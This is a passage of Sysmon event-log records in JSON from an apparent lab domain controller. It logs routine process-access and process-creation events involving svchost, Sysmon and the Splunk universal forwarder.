05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.227\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BA-5F25-0000-0010C0090600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.227","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BA-5F25-0000-0010C0090600}","TargetProcessId":"1164","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:50.915\r\nProcessGuid: {A837DB8D-02BA-5F25-0000-0010890B0600}\r\nProcessId: 4412\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:50.915","ProcessGuid":"{A837DB8D-02BA-5F25-0000-0010890B0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
